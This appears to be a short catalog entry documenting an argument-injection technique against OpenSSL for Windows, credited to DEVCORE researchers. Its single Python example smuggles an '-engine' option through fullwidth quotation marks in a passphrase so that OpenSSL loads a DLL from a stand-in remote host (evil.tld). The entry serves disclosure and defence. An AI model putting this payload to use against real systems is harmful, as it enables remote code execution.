.. /openssl.exe

Star

Vendors:

• OpenSSL for Windows

Code Execution

1. You are able to inject -engine to load remote DLLs.

   subprocess.run(['openssl.exe', 'enc', '-aes-256-cbc', '-in', 'in.txt', '-out', 'out.txt', '-k', 'p4ssphr4s3＂ ＂-engine＂ ＂\\\\evil.tld\\bad.dll'])

   Use case

   If certain parts of the argument(s) are controllable, the attacker can inject additional arguments.

   Code Pages

   125x, 874

Acknowledgements:

• DEVCORE Research Team (@d3vc0r3)